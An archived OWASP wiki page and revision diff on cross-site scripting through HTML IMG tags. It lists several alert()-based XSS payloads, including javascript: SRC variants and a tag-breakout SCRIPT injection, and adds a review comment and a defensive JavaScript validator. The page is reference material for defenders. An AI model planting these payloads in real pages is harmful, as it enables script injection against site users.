This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "Script in IMG tags"
Weilin Zhong (talk | contribs) |
(Add positive test result) |
||
(5 intermediate revisions by 4 users not shown) | |||
Line 1: | Line 1: | ||
− | |||
− | |||
− | |||
==Description== | ==Description== | ||
+ | It is possible for an attacker to execute JavaScript via HTML IMG tags. This is also referred to as XSS (Cross-Site Scripting). However, this type of attack is no longer possible on modern browsers. It has been tested as working on Internet Explorer (IE) 6 running on Windows XP. | ||
==Examples == | ==Examples == | ||
+ | The following are methods an attacker can use in order to execute Javascript but will not be effective against modern browsers.<br><br> | ||
+ | |||
+ | <IMG SRC="javascript:alert('Vulnerable');"><br> | ||
+ | <IMG SRC=javascript:alert('XSS')><br> | ||
+ | <IMG SRC=JaVaScRiPt:alert('XSS')><br> | ||
+ | <IMG SRC=javascript:alert("XSS")><br> | ||
+ | <IMG SRC=`javascript:alert("RSnake says, <br> | ||
+ | 'XSS'")`><br > | ||
+ | <IMG """><SCRIPT>alert("XSS")</SCRIPT>"><br> | ||
+ | <IMG <br> | ||
+ | SRC=javascript:alert(String.fromCharCode(88,83,83))><br> | ||
+ | <IMG <br> SRC=javascript:alert('XSS')><br> | ||
==Related Threats== | ==Related Threats== |
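Review bot: the added Examples lead-in says none of these methods are effective against modern browsers, but the added entry `<IMG """><SCRIPT>alert("XSS")</SCRIPT>">` does not put a javascript: URL in SRC at all. It ends the IMG tag and carries its own SCRIPT element, so the caveat about javascript: in IMG SRC does not describe it. Suggest listing that entry separately from the SRC=javascript: entries and stating the countermeasure (encode untrusted text before writing it into a tag) instead of leaning on browser behaviour. The final entry, `<IMG <br> SRC=javascript:alert('XSS')>`, repeats the second example apart from the line break; say what variation it is meant to show or drop it. The Description names IE 6 on Windows XP as the tested platform, and it would help to say which of the listed entries that test covered.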
Latest revision as of 13:11, 19 May 2015
Description
It is possible for an attacker to execute JavaScript via HTML IMG tags. This is also referred to as XSS (Cross-Site Scripting). However, this type of attack is no longer possible on modern browsers. It has been tested as working on Internet Explorer (IE) 6 running on Windows XP.
Examples
The following are methods an attacker can use to execute JavaScript; they will not be effective against modern browsers.
<IMG SRC="javascript:alert('Vulnerable');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says,
'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG
SRC=javascript:alert('XSS')>
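A server-side check for the SRC values listed above, as an added example that is not part of the original OWASP page: it normalises an untrusted value, accepts only relative URLs or an allowlisted scheme, and encodes the value before writing it into the tag. The function names and the http/https allowlist are assumptions made for this illustration.

```javascript
// Added example, not OWASP code. Policy values below are assumptions.
const ALLOWED_SCHEMES = new Set(["http", "https"]);
const NAMED = { colon: ":", tab: "\t", newline: "\n" };

// Decode character references once, as an HTML parser does before the URL is read.
function decodeCharRefs(s) {
  const re = /&#x([0-9a-f]+);?|&#(\d+);?|&(colon|Tab|NewLine);/gi;
  return s.replace(re, (m, hex, dec, name) => {
    if (name) return NAMED[name.toLowerCase()];
    const cp = hex ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : "\ufffd";
  });
}

// True for a relative URL or an allowlisted scheme; everything else is rejected.
function isSafeImgSrc(raw) {
  // Remove whitespace and control characters before looking for the scheme,
  // so the comparison does not depend on how lenient a given parser is.
  const v = decodeCharRefs(String(raw)).replace(/[\u0000-\u0020\u007f]/g, "");
  const m = /^([^/?#:]*):/.exec(v); // text before the first ':' that precedes any / ? #
  if (!m) return v.length > 0; // no scheme: treated as a relative URL
  return ALLOWED_SCHEMES.has(m[1].toLowerCase());
}

// Encode for a double-quoted attribute so the value cannot end the attribute or tag.
function escapeAttr(s) {
  return String(s).replace(/[&<>"'`]/g, (c) => "&#" + c.charCodeAt(0) + ";");
}

// Returns markup for accepted values, null for rejected ones.
function renderImg(raw) {
  return isSafeImgSrc(raw) ? '<img src="' + escapeAttr(raw) + '">' : null;
}

// SRC values from the page's examples, then two constructed benign values.
const SAMPLES = [
  "javascript:alert('Vulnerable');",
  "JaVaScRiPt:alert('XSS')",
  "`javascript:alert(\"RSnake says, 'XSS'\")`",
  "javascript:alert(String.fromCharCode(88,83,83))",
  "\"><SCRIPT>alert(\"XSS\")</SCRIPT>", // tag-breakout text from the page, used as a value
  "https://example.com/logo.png",
  "images/logo.png",
];

function checkSamples() {
  return SAMPLES.map((s) => ({ src: s, html: renderImg(s) }));
}

console.log(checkSamples());
```

The four javascript: values are rejected outright; the tag-breakout text passes the scheme check as a relative URL but comes out fully encoded inside the attribute, so it stays inert.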
Related Threats
Related Attacks
Related Vulnerabilities
Related Countermeasures
This article is a stub. You can help OWASP by expanding it or discussing it on its Talk page.